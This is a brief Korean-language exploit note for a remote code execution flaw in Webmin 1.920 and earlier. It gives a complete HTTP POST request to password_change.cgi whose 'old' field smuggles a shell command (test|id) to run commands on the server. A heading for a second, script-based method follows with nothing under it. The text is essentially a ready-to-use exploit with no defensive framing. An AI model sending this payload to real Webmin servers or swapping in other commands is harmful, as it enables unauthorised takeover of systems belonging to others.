
Webmin의 원격 코드 실행 취약점
영향받는 버전: Webmin 1.920 이하 버전

다음 데이터 패킷을 전송하면 id 명령을 실행할 수 있습니다:
POST /password_change.cgi HTTP/1.1 Host: your-ip:10000 Accept-Encoding: gzip, deflate Accept: / Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Cookie: redirect=1; testing=1; sid=x; sessiontest=1 Referer: https://your-ip:10000/session_login.cgi Content-Type: application/x-www-form-urlencoded Content-Length: 60
user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2

방법 2: 스크립트 활용
